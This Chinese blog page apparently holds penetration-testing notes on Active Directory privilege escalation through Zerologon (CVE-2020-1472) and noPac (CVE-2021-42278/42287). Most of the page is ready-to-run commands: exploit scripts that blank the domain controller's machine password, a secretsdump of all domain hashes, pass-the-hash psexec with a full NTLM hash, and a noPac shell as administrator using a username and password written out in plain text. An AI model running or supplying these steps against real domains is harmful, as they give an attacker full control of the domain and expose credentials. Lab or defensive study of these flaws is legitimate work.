当前位置: 首页 > news >正文

域内的权限提升

news 2025/9/4 8:01:58

CVE-2020-1472

域内有一个服务:MS-NRPC(建立与域控安全通道),可利用此漏洞获取域管访问权限。

  1. 检测这个漏洞能不能打,能打之后,将域控的机器hash置空,密码为空,那么你就可以通过空的hash读取administrator的密码(dcsync,administrator domain admins 机器用户,domain control)
  1. 环境的准备
windows2019 域控
Impacket工具包:https://github.com/SecureAuthCorp/impacket.git
poc:https://github.com/SecuraBV/CVE-2020-1472.git
exp:https://github.com/dirkjanm/CVE-2020-1472
exp:https://github.com/risksense/zerologon
  1. 先用poc检测
https://github.com/SecuraBV/CVE-2020-1472
python zerologon_tester.py WIN-EB8RC552TFJ 10.10.10.90
Given a domain controller named `WIN-EB8RC552TFJ` with IP address `192.168.7.49`, run the script as follows

  1. 在使用exp利用
https://github.com/dirkjanm/CVE-2020-1472
python cve-2020-1472-exploit.py WIN-EB8RC552TFJ 10.10.10.90

  1. PTH拿下域控
secretsdump该工具读取域内全部的hash
secretsdump.exe sis2504/WIN-EB8RC552TFJ$@10.10.10.90 -just-dc -no-pass

psexec.exe administrator@10.10.10.90 -hashes aad3b435b51404eeaad3b435b51404ee:937b842c7cfa612cc40196a5d89b4823

CVE-2021-42278 & CVE-2021-42287

域内允许加入域的用的(我们的客户机在加入域的时候,会输入一个账户名和密码,域允许这个用户创建一个机器账户),域允许这个用户(test001)创建一个机器用户(域控制器的hostname--dc,dc$)当你用DC$(test001创建的这个机器账户申请票据的时候,域控会将你识别成自己,就把自己的票(TGT))就发给你了,你是不是就拥有了一张高权限的票。

  1. 利用条件
具有一个域内的合法的用户 -- 低权限 高权限 都可以
合法的用户怎么获取:用户名+密码喷洒 asprating kerberosting
  1. 漏洞利用
先做扫描 -- 检测一下这个漏洞能不能打 poc的检测
python scanner.py sis2504.club/zhangli:"FLW.com12138a" -dc-ip 192.168.7.49 -use-ldap

python noPac.py sis2504.club/zhangli:"FLW.com12138a" -dc-ip 192.168.7.49 -dc-host WIN-EB8RC552TFJ -shell --impersonate administrator -use-ldap

其他的用法自己看readme.md

http://www.xdnf.cn/news/1443781.html

相关文章:

  • 计算机网络模型总概述
  • 从检索的角度聊聊数据结构的演进​
  • 基于springboot的在线答题练习系统
  • 【vulhub】thinkphp漏洞系列
  • Java设计模式之结构型—适配器模式
  • 需求调研的核心目标
  • 并发编程——14 线程池参数动态化
  • 前端自动化打包服务器无法安装高版本 Node.js v22 问题解决
  • 京东商品评论API接口概述,json数据返回
  • 51单片机:发光二极管与动态数码管控制
  • 迅为RK3568开发板体验OpenHarmony—烧写镜像-安装驱动
  • dumpsys alarm 简介
  • 关于kafka:consumer_offsets日志不能自动清理,设置自动清理规则
  • Trae x Vizro:低代码构建专业数据可视化仪表板的高效方案
  • 小迪web自用笔记25
  • 年成本下降超80%,银行数据治理与自动化应用实录
  • DS1202示波器的使用教程笔记
  • 【C++八股文】数据结构篇
  • 【Python-Day 42】解锁文本处理神技:Python 正则表达式 (Regex) 从入门到实战
  • FPGA离群值剔除算法
  • wpf 自定义输入ip地址的文本框
  • Linux之shell-awk命令详解
  • Jenkins 可观测最佳实践
  • Jenkins和Fastlane的原理、优缺点、用法、如何选择
  • 记录一下node后端写下载https的文件报错,而浏览器却可以下载。
  • nginx配置端口转发(docker-compose方式、包括TCP转发和http转发)
  • C++ 面试高频考点 力扣 162. 寻找峰值 二分查找 题解 每日一题
  • Apache Kafka:现代数据高速公路的设计哲学
  • 嵌入式硬件 - 51单片机2
  • (11)用于无GPS导航的制图师SLAM(二)